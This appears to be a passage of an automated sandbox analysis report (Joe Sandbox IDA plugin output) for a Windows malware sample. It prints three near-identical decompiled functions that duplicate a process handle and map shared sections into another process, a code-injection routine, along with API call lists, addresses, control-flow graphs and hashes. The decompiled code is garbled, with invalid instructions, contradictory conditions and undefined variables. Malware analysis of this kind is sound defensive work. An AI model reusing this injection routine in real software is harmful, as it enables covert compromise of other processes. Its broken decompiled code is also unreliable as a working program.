                                                            					_push(_t140 - 0x10);
                                                            					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t140 - 0x10), 0xffffffff, 0xffffffff, _t140 - 0xc, 0, 0, 2) == 0) {
                                                            						 *((intOrPtr*)(_t140 - 8)) = 0;
                                                            						_t103 = _t140 - 0x50;
                                                            						 *((intOrPtr*)(_t103 + 4)) = 0;
                                                            						 *_t103 = 0x5000;
                                                            						_t136 = _t140 - 0x54;
                                                            						if(NtCreateSection(_t136, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
                                                            							 *_t25 =  *(_t140 - 0x50);
                                                            							_t111 = _t140 - 0x44;
                                                            							 *_t111 = 0;
                                                            							if(NtMapViewOfSection( *_t136, 0xffffffff, _t111, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
                                                            								_t113 = _t140 - 0x3c;
                                                            								 *_t113 = 0;
                                                            								if(NtMapViewOfSection( *_t136,  *(_t140 - 0xc), _t113, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
                                                            									_t136 =  *(_t140 - 0x44);
                                                            									 *((intOrPtr*)(_t118 + 0x20))(0, _t136, 0x104);
                                                            									_t136[0x82] =  *(_t140 + 0x14);
                                                            									 *((intOrPtr*)(_t140 - 8)) =  *((intOrPtr*)(_t140 - 8)) + 1;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t105 = _t140 - 0x50;
                                                            						_t125 =  *((intOrPtr*)(_t140 + 0x10)) + 0x10000;
                                                            						_t105[4] = 0;
                                                            						 *_t105 = _t125;
                                                            						while(1) {
                                                            							 *(_t140 + 0x6857a875) =  *(_t140 + 0x6857a875) | _t125;
                                                            							 *_t105 =  &(_t105[ *_t105]);
                                                            							 *_t105 =  *_t105 + _t125;
                                                            							_push(0x40);
                                                            							_push(_t105);
                                                            							_push(0);
                                                            							_push(0xe);
                                                            							if(NtCreateSection(_t136) != 0 ||  *((intOrPtr*)(_t140 - 8)) == 0) {
                                                            								goto L73;
                                                            							}
                                                            							 *_t47 =  *(_t140 - 0x50);
                                                            							_t107 = _t140 - 0x48;
                                                            							 *_t107 = 0;
                                                            							if(NtMapViewOfSection( *_t136, 0xffffffff, _t107, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
                                                            								_t109 = _t140 - 0x40;
                                                            								 *_t109 = 0;
                                                            								_t125 = _t140 - 0x38;
                                                            								_push(0x20);
                                                            								while(1) {
                                                            									 *0x0000006A =  *0x0000006A & _t131;
                                                            									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(_t109);
                                                            									_push( *(_t140 - 0xc));
                                                            									_t109 = NtMapViewOfSection( *_t136);
                                                            									_t161 = _t109;
                                                            									if(_t161 != 0) {
                                                            										goto L73;
                                                            									}
                                                            									L26();
                                                            									if(_t161 == 0 && _t161 != 0) {
                                                            										asm("out dx, al");
                                                            										if(_t161 > 0) {
                                                            											continue;
                                                            										} else {
                                                            											if (_t161 > 0) goto L20;
                                                            											goto L30;
                                                            										}
                                                            									}
                                                            									goto L73;
                                                            								}
                                                            							}
                                                            							goto L73;
                                                            						}
                                                            					}
                                                            				}
                                                            				L73:
                                                            				_push(0x165f);
                                                            				_t97 =  *_t142;
                                                            				_t121 = 0x38c;
                                                            				_t130 = 0xfd;
                                                            				L004012A4(_t97, _t118, _t121, _t130, 0, _t136, __eflags);
                                                            				return _t97;
                                                            			}



























                                                            0x00401636
                                                            0x00401649
                                                            0x00401649
                                                            0x00401652
                                                            0x0040165a
                                                            0x0040165b
                                                            0x0040165c
                                                            0x0040165d
                                                            0x0040165f
                                                            0x00401664
                                                            0x0040166d
                                                            0x0040166f
                                                            0x0040166f
                                                            0x00401672
                                                            0x00401672
                                                            0x00401677
                                                            0x00000000
                                                            0x00000000
                                                            0x0040199f
                                                            0x0040199f
                                                            0x0040167d
                                                            0x00401680
                                                            0x00401683
                                                            0x00401687
                                                            0x0040168a
                                                            0x0040168e
                                                            0x00401694
                                                            0x00401697
                                                            0x00401699
                                                            0x0040169c
                                                            0x004016a2
                                                            0x004016a5
                                                            0x004016ab
                                                            0x004016b3
                                                            0x004016b4
                                                            0x004016b5
                                                            0x004016b7
                                                            0x004016bd
                                                            0x004016e0
                                                            0x004016e3
                                                            0x004016e6
                                                            0x004016e9
                                                            0x004016ef
                                                            0x00401704
                                                            0x00401709
                                                            0x0040170c
                                                            0x0040170f
                                                            0x00401727
                                                            0x00401729
                                                            0x0040172c
                                                            0x00401745
                                                            0x00401747
                                                            0x00401751
                                                            0x00401757
                                                            0x0040175d
                                                            0x0040175d
                                                            0x00401745
                                                            0x00401727
                                                            0x00401760
                                                            0x00401766
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401770
                                                            0x00401770
                                                            0x00401776
                                                            0x00401778
                                                            0x0040177a
                                                            0x0040177c
                                                            0x0040177d
                                                            0x0040177e
                                                            0x00401786
                                                            0x00000000
                                                            0x00000000
                                                            0x00401799
                                                            0x0040179c
                                                            0x0040179f
                                                            0x004017b7
                                                            0x004017bd
                                                            0x004017c0
                                                            0x004017c2
                                                            0x004017c5
                                                            0x004017c6
                                                            0x004017c6
                                                            0x004017c9
                                                            0x004017cc
                                                            0x004017cd
                                                            0x004017ce
                                                            0x004017cf
                                                            0x004017d4
                                                            0x004017d7
                                                            0x004017d9
                                                            0x00000000
                                                            0x00000000
                                                            0x004017df
                                                            0x004017e4
                                                            0x004017e8
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017eb
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017e4
                                                            0x004017c6
                                                            0x00000000
                                                            0x004017b7
                                                            0x00401770
                                                            0x004016bd
                                                            0x00401998
                                                            0x004019ae
                                                            0x004019b3
                                                            0x004019ca
                                                            0x004019de
                                                            0x004019e6
                                                            0x004019ef

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
                                                            • Instruction ID: 1a98c01ee067268ab26ec5aa6b62cb03245118aa372be3bd2590492ddd99a6c2
                                                            • Opcode Fuzzy Hash: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
                                                            • Instruction Fuzzy Hash: 3B616EB1900209AFDB209F91CC49FEF7BB8FF86700F14056AF911BA2E1D6759901CB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 177 401620-40166d call 4012a4 188 401672-401677 177->188 189 40166f 177->189 191 40199a-4019a2 188->191 192 40167d-40168e 188->192 189->188 191->188 195 4019a7-4019ef call 4012a4 191->195 196 401694-4016bd 192->196 197 401998 192->197 196->197 204 4016c3-4016da NtDuplicateObject 196->204 197->195 204->197 206 4016e0-401704 NtCreateSection 204->206 209 401760-401786 NtCreateSection 206->209 210 401706-401727 NtMapViewOfSection 206->210 209->197 213 40178c-401790 209->213 210->209 212 401729-401745 NtMapViewOfSection 210->212 212->209 215 401747-40175d 212->215 213->197 216 401796-4017b7 NtMapViewOfSection 213->216 215->209 216->197 218 4017bd-4017d9 NtMapViewOfSection 216->218 218->197 221 4017df 218->221 221->197 222 4017df call 4017e4 221->222 222->197
                                                            C-Code - Quality: 51%
                                                            			E00401620() {
                                                            				intOrPtr _t92;
                                                            				intOrPtr _t94;
                                                            				void* _t97;
                                                            				intOrPtr _t98;
                                                            				struct _GUID _t104;
                                                            				signed char* _t106;
                                                            				PVOID* _t108;
                                                            				PVOID* _t112;
                                                            				PVOID* _t114;
                                                            				void* _t118;
                                                            				intOrPtr _t119;
                                                            				void* _t122;
                                                            				void** _t123;
                                                            				signed char _t126;
                                                            				void* _t130;
                                                            				void* _t131;
                                                            				signed char _t132;
                                                            				void* _t133;
                                                            				void* _t136;
                                                            				HANDLE* _t137;
                                                            				void* _t140;
                                                            				void* _t141;
                                                            				intOrPtr* _t143;
                                                            				intOrPtr* _t144;
                                                            				void* _t148;
                                                            				long _t163;
                                                            
                                                            				asm("out 0x31, eax");
                                                            				asm("out dx, al");
                                                            				_push(0x165f);
                                                            				_t92 =  *_t143;
                                                            				_t144 = _t143 + 4;
                                                            				__eax = __eax | 0x68e1228a;
                                                            				__eflags = __eax;
                                                            				_t130 = 0xfd;
                                                            				L004012A4(_t92, _t118, 0x38c, _t130, _t133, _t136, _t148);
                                                            				_t141 = _t140 + 1;
                                                            				asm("cld");
                                                            				asm("invalid");
                                                            				_t119 =  *((intOrPtr*)(_t141 + 8));
                                                            				 *((intOrPtr*)(_t141 - 0x34)) = 0;
                                                            				if(gs != 0) {
                                                            					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
                                                            				}
                                                            				while(1) {
                                                            					_t94 =  *((intOrPtr*)(_t119 + 0x48))();
                                                            					if(_t94 != 0) {
                                                            						break;
                                                            					}
                                                            					 *((intOrPtr*)(_t119 + 0x1c))(0x3e8);
                                                            				}
                                                            				 *((intOrPtr*)(_t141 - 0x5c)) = _t94;
                                                            				_t137 = _t141 - 0x60;
                                                            				 *_t137 = 0;
                                                            				 *((intOrPtr*)(_t119 + 0x4c))(_t94, _t137);
                                                            				_t97 =  *_t137;
                                                            				if(_t97 != 0) {
                                                            					_t123 = _t141 - 0x30;
                                                            					 *_t123 = _t97;
                                                            					_t123[1] = 0;
                                                            					_t137 = _t141 - 0x28;
                                                            					 *((intOrPtr*)(_t119 + 0x10))(_t137, 0x18);
                                                            					 *_t137 = 0x18;
                                                            					_t132 = _t137;
                                                            					_push(_t141 - 0x30);
                                                            					_push(_t132);
                                                            					_push(0x40);
                                                            					_push(_t141 - 0x10);
                                                            					if( *((intOrPtr*)(_t119 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
                                                            						 *((intOrPtr*)(_t141 - 8)) = 0;
                                                            						_t104 = _t141 - 0x50;
                                                            						 *((intOrPtr*)(_t104 + 4)) = 0;
                                                            						 *_t104 = 0x5000;
                                                            						_t137 = _t141 - 0x54;
                                                            						if(NtCreateSection(_t137, 6, 0, _t104, 4, 0x8000000, 0) == 0) {
                                                            							 *_t25 =  *(_t141 - 0x50);
                                                            							_t112 = _t141 - 0x44;
                                                            							 *_t112 = 0;
                                                            							if(NtMapViewOfSection( *_t137, 0xffffffff, _t112, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            								_t114 = _t141 - 0x3c;
                                                            								 *_t114 = 0;
                                                            								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t114, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            									_t137 =  *(_t141 - 0x44);
                                                            									 *((intOrPtr*)(_t119 + 0x20))(0, _t137, 0x104);
                                                            									_t137[0x82] =  *(_t141 + 0x14);
                                                            									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t106 = _t141 - 0x50;
                                                            						_t126 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
                                                            						_t106[4] = 0;
                                                            						 *_t106 = _t126;
                                                            						while(1) {
                                                            							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t126;
                                                            							 *_t106 =  &(_t106[ *_t106]);
                                                            							 *_t106 =  *_t106 + _t126;
                                                            							_push(0x40);
                                                            							_push(_t106);
                                                            							_push(0);
                                                            							_push(0xe);
                                                            							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
                                                            								goto L74;
                                                            							}
                                                            							 *_t47 =  *(_t141 - 0x50);
                                                            							_t108 = _t141 - 0x48;
                                                            							 *_t108 = 0;
                                                            							if(NtMapViewOfSection( *_t137, 0xffffffff, _t108, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            								_t110 = _t141 - 0x40;
                                                            								 *_t110 = 0;
                                                            								_t126 = _t141 - 0x38;
                                                            								_push(0x20);
                                                            								while(1) {
                                                            									 *0x0000006A =  *0x0000006A & _t132;
                                                            									 *((intOrPtr*)(_t126 + 0x57)) =  *((intOrPtr*)(_t126 + 0x57)) + _t132;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(_t110);
                                                            									_push( *(_t141 - 0xc));
                                                            									_t110 = NtMapViewOfSection( *_t137);
                                                            									_t163 = _t110;
                                                            									if(_t163 != 0) {
                                                            										goto L74;
                                                            									}
                                                            									L27();
                                                            									if(_t163 == 0 && _t163 != 0) {
                                                            										asm("out dx, al");
                                                            										if(_t163 > 0) {
                                                            											continue;
                                                            										} else {
                                                            											if (_t163 > 0) goto L21;
                                                            											goto L31;
                                                            										}
                                                            									}
                                                            									goto L74;
                                                            								}
                                                            							}
                                                            							goto L74;
                                                            						}
                                                            					}
                                                            				}
                                                            				L74:
                                                            				_push(0x165f);
                                                            				_t98 =  *_t144;
                                                            				_t122 = 0x38c;
                                                            				_t131 = 0xfd;
                                                            				L004012A4(_t98, _t119, _t122, _t131, 0, _t137, __eflags);
                                                            				return _t98;
                                                            			}





























                                                            0x00401622
                                                            0x00401624
                                                            0x00401625
                                                            0x0040162a
                                                            0x0040162d
                                                            0x00401649
                                                            0x00401649
                                                            0x00401652
                                                            0x0040165a
                                                            0x0040165b
                                                            0x0040165c
                                                            0x0040165d
                                                            0x0040165f
                                                            0x00401664
                                                            0x0040166d
                                                            0x0040166f
                                                            0x0040166f
                                                            0x00401672
                                                            0x00401672
                                                            0x00401677
                                                            0x00000000
                                                            0x00000000
                                                            0x0040199f
                                                            0x0040199f
                                                            0x0040167d
                                                            0x00401680
                                                            0x00401683
                                                            0x00401687
                                                            0x0040168a
                                                            0x0040168e
                                                            0x00401694
                                                            0x00401697
                                                            0x00401699
                                                            0x0040169c
                                                            0x004016a2
                                                            0x004016a5
                                                            0x004016ab
                                                            0x004016b3
                                                            0x004016b4
                                                            0x004016b5
                                                            0x004016b7
                                                            0x004016bd
                                                            0x004016e0
                                                            0x004016e3
                                                            0x004016e6
                                                            0x004016e9
                                                            0x004016ef
                                                            0x00401704
                                                            0x00401709
                                                            0x0040170c
                                                            0x0040170f
                                                            0x00401727
                                                            0x00401729
                                                            0x0040172c
                                                            0x00401745
                                                            0x00401747
                                                            0x00401751
                                                            0x00401757
                                                            0x0040175d
                                                            0x0040175d
                                                            0x00401745
                                                            0x00401727
                                                            0x00401760
                                                            0x00401766
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401770
                                                            0x00401770
                                                            0x00401776
                                                            0x00401778
                                                            0x0040177a
                                                            0x0040177c
                                                            0x0040177d
                                                            0x0040177e
                                                            0x00401786
                                                            0x00000000
                                                            0x00000000
                                                            0x00401799
                                                            0x0040179c
                                                            0x0040179f
                                                            0x004017b7
                                                            0x004017bd
                                                            0x004017c0
                                                            0x004017c2
                                                            0x004017c5
                                                            0x004017c6
                                                            0x004017c6
                                                            0x004017c9
                                                            0x004017cc
                                                            0x004017cd
                                                            0x004017ce
                                                            0x004017cf
                                                            0x004017d4
                                                            0x004017d7
                                                            0x004017d9
                                                            0x00000000
                                                            0x00000000
                                                            0x004017df
                                                            0x004017e4
                                                            0x004017e8
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017eb
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017e4
                                                            0x004017c6
                                                            0x00000000
                                                            0x004017b7
                                                            0x00401770
                                                            0x004016bd
                                                            0x00401998
                                                            0x004019ae
                                                            0x004019b3
                                                            0x004019ca
                                                            0x004019de
                                                            0x004019e6
                                                            0x004019ef

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
                                                            • Instruction ID: 1699ca97ca40bad7abeb66134b5fd6c1258c3ab016587a1f667b162b5110635e
                                                            • Opcode Fuzzy Hash: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
                                                            • Instruction Fuzzy Hash: 5B513DB4900249BFEB209F95CC48FEF7BB8EF85700F14416AF911BA1E5D6759941CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 223 401633-40166d call 4012a4 235 401672-401677 223->235 236 40166f 223->236 238 40199a-4019a2 235->238 239 40167d-40168e 235->239 236->235 238->235 242 4019a7-4019ef call 4012a4 238->242 243 401694-4016bd 239->243 244 401998 239->244 243->244 251 4016c3-4016da NtDuplicateObject 243->251 244->242 251->244 253 4016e0-401704 NtCreateSection 251->253 256 401760-401786 NtCreateSection 253->256 257 401706-401727 NtMapViewOfSection 253->257 256->244 260 40178c-401790 256->260 257->256 259 401729-401745 NtMapViewOfSection 257->259 259->256 262 401747-40175d 259->262 260->244 263 401796-4017b7 NtMapViewOfSection 260->263 262->256 263->244 265 4017bd-4017d9 NtMapViewOfSection 263->265 265->244 268 4017df 265->268 268->244 269 4017df call 4017e4 268->269 269->244
                                                            C-Code - Quality: 53%
                                                            			E00401633(void* __edi) {
                                                            				intOrPtr _t91;
                                                            				intOrPtr _t93;
                                                            				void* _t96;
                                                            				intOrPtr _t97;
                                                            				struct _GUID _t103;
                                                            				signed char* _t105;
                                                            				PVOID* _t107;
                                                            				PVOID* _t111;
                                                            				PVOID* _t113;
                                                            				void* _t117;
                                                            				intOrPtr _t118;
                                                            				void* _t121;
                                                            				void** _t122;
                                                            				signed char _t125;
                                                            				void* _t129;
                                                            				void* _t130;
                                                            				signed char _t131;
                                                            				void* _t136;
                                                            				HANDLE* _t137;
                                                            				void* _t140;
                                                            				void* _t141;
                                                            				intOrPtr* _t143;
                                                            				intOrPtr* _t144;
                                                            				void* _t148;
                                                            				long _t163;
                                                            
                                                            				_t133 = __edi - 1;
                                                            				_t148 = __edi - 1;
                                                            				_push(0x165f);
                                                            				_t91 =  *_t143;
                                                            				_t144 = _t143 + 4;
                                                            				__eax = __eax | 0x68e1228a;
                                                            				__eflags = __eax;
                                                            				_t129 = 0xfd;
                                                            				L004012A4(_t91, _t117, 0x38c, _t129, _t133, _t136, _t148);
                                                            				_t141 = _t140 + 1;
                                                            				asm("cld");
                                                            				asm("invalid");
                                                            				_t118 =  *((intOrPtr*)(_t141 + 8));
                                                            				 *((intOrPtr*)(_t141 - 0x34)) = 0;
                                                            				if(gs != 0) {
                                                            					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
                                                            				}
                                                            				while(1) {
                                                            					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
                                                            					if(_t93 != 0) {
                                                            						break;
                                                            					}
                                                            					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
                                                            				}
                                                            				 *((intOrPtr*)(_t141 - 0x5c)) = _t93;
                                                            				_t137 = _t141 - 0x60;
                                                            				 *_t137 = 0;
                                                            				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t137);
                                                            				_t96 =  *_t137;
                                                            				if(_t96 != 0) {
                                                            					_t122 = _t141 - 0x30;
                                                            					 *_t122 = _t96;
                                                            					_t122[1] = 0;
                                                            					_t137 = _t141 - 0x28;
                                                            					 *((intOrPtr*)(_t118 + 0x10))(_t137, 0x18);
                                                            					 *_t137 = 0x18;
                                                            					_t131 = _t137;
                                                            					_push(_t141 - 0x30);
                                                            					_push(_t131);
                                                            					_push(0x40);
                                                            					_push(_t141 - 0x10);
                                                            					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
                                                            						 *((intOrPtr*)(_t141 - 8)) = 0;
                                                            						_t103 = _t141 - 0x50;
                                                            						 *((intOrPtr*)(_t103 + 4)) = 0;
                                                            						 *_t103 = 0x5000;
                                                            						_t137 = _t141 - 0x54;
                                                            						if(NtCreateSection(_t137, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
                                                            							 *_t25 =  *(_t141 - 0x50);
                                                            							_t111 = _t141 - 0x44;
                                                            							 *_t111 = 0;
                                                            							if(NtMapViewOfSection( *_t137, 0xffffffff, _t111, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            								_t113 = _t141 - 0x3c;
                                                            								 *_t113 = 0;
                                                            								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t113, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            									_t137 =  *(_t141 - 0x44);
                                                            									 *((intOrPtr*)(_t118 + 0x20))(0, _t137, 0x104);
                                                            									_t137[0x82] =  *(_t141 + 0x14);
                                                            									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t105 = _t141 - 0x50;
                                                            						_t125 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
                                                            						_t105[4] = 0;
                                                            						 *_t105 = _t125;
                                                            						while(1) {
                                                            							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t125;
                                                            							 *_t105 =  &(_t105[ *_t105]);
                                                            							 *_t105 =  *_t105 + _t125;
                                                            							_push(0x40);
                                                            							_push(_t105);
                                                            							_push(0);
                                                            							_push(0xe);
                                                            							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
                                                            								goto L75;
                                                            							}
                                                            							 *_t47 =  *(_t141 - 0x50);
                                                            							_t107 = _t141 - 0x48;
                                                            							 *_t107 = 0;
                                                            							if(NtMapViewOfSection( *_t137, 0xffffffff, _t107, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
                                                            								_t109 = _t141 - 0x40;
                                                            								 *_t109 = 0;
                                                            								_t125 = _t141 - 0x38;
                                                            								_push(0x20);
                                                            								while(1) {
                                                            									 *0x0000006A =  *0x0000006A & _t131;
                                                            									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
                                                            									_push(0);
                                                            									_push(0);
                                                            									_push(_t109);
                                                            									_push( *(_t141 - 0xc));
                                                            									_t109 = NtMapViewOfSection( *_t137);
                                                            									_t163 = _t109;
                                                            									if(_t163 != 0) {
                                                            										goto L75;
                                                            									}
                                                            									L28();
                                                            									if(_t163 == 0 && _t163 != 0) {
                                                            										asm("out dx, al");
                                                            										if(_t163 > 0) {
                                                            											continue;
                                                            										} else {
                                                            											if (_t163 > 0) goto L22;
                                                            											goto L32;
                                                            										}
                                                            									}
                                                            									goto L75;
                                                            								}
                                                            							}
                                                            							goto L75;
                                                            						}
                                                            					}
                                                            				}
                                                            				L75:
                                                            				_push(0x165f);
                                                            				_t97 =  *_t144;
                                                            				_t121 = 0x38c;
                                                            				_t130 = 0xfd;
                                                            				L004012A4(_t97, _t118, _t121, _t130, 0, _t137, __eflags);
                                                            				return _t97;
                                                            			}




























                                                            0x00401633
                                                            0x00401633
                                                            0x00401625
                                                            0x0040162a
                                                            0x0040162d
                                                            0x00401649
                                                            0x00401649
                                                            0x00401652
                                                            0x0040165a
                                                            0x0040165b
                                                            0x0040165c
                                                            0x0040165d
                                                            0x0040165f
                                                            0x00401664
                                                            0x0040166d
                                                            0x0040166f
                                                            0x0040166f
                                                            0x00401672
                                                            0x00401672
                                                            0x00401677
                                                            0x00000000
                                                            0x00000000
                                                            0x0040199f
                                                            0x0040199f
                                                            0x0040167d
                                                            0x00401680
                                                            0x00401683
                                                            0x00401687
                                                            0x0040168a
                                                            0x0040168e
                                                            0x00401694
                                                            0x00401697
                                                            0x00401699
                                                            0x0040169c
                                                            0x004016a2
                                                            0x004016a5
                                                            0x004016ab
                                                            0x004016b3
                                                            0x004016b4
                                                            0x004016b5
                                                            0x004016b7
                                                            0x004016bd
                                                            0x004016e0
                                                            0x004016e3
                                                            0x004016e6
                                                            0x004016e9
                                                            0x004016ef
                                                            0x00401704
                                                            0x00401709
                                                            0x0040170c
                                                            0x0040170f
                                                            0x00401727
                                                            0x00401729
                                                            0x0040172c
                                                            0x00401745
                                                            0x00401747
                                                            0x00401751
                                                            0x00401757
                                                            0x0040175d
                                                            0x0040175d
                                                            0x00401745
                                                            0x00401727
                                                            0x00401760
                                                            0x00401766
                                                            0x0040176c
                                                            0x0040176f
                                                            0x00401770
                                                            0x00401770
                                                            0x00401776
                                                            0x00401778
                                                            0x0040177a
                                                            0x0040177c
                                                            0x0040177d
                                                            0x0040177e
                                                            0x00401786
                                                            0x00000000
                                                            0x00000000
                                                            0x00401799
                                                            0x0040179c
                                                            0x0040179f
                                                            0x004017b7
                                                            0x004017bd
                                                            0x004017c0
                                                            0x004017c2
                                                            0x004017c5
                                                            0x004017c6
                                                            0x004017c6
                                                            0x004017c9
                                                            0x004017cc
                                                            0x004017cd
                                                            0x004017ce
                                                            0x004017cf
                                                            0x004017d4
                                                            0x004017d7
                                                            0x004017d9
                                                            0x00000000
                                                            0x00000000
                                                            0x004017df
                                                            0x004017e4
                                                            0x004017e8
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017eb
                                                            0x00000000
                                                            0x004017eb
                                                            0x004017e9
                                                            0x00000000
                                                            0x004017e4
                                                            0x004017c6
                                                            0x00000000
                                                            0x004017b7
                                                            0x00401770
                                                            0x004016bd
                                                            0x00401998
                                                            0x004019ae
                                                            0x004019b3
                                                            0x004019ca
                                                            0x004019de
                                                            0x004019e6
                                                            0x004019ef

                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
                                                            • Instruction ID: 5655e8303908613cde864c6bbac167efe87e7d1838107c86971bbf59092d50a6
                                                            • Opcode Fuzzy Hash: 1492376489f25b9bae1e5169c701029808c7dd5dc88d9e6fca770c1444d527a0
                                                            • Instruction Fuzzy Hash: 57513BB0900249BBEB208F95CC48FEF7BB8EF85B00F14416AF911BA2E4D6759941CB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
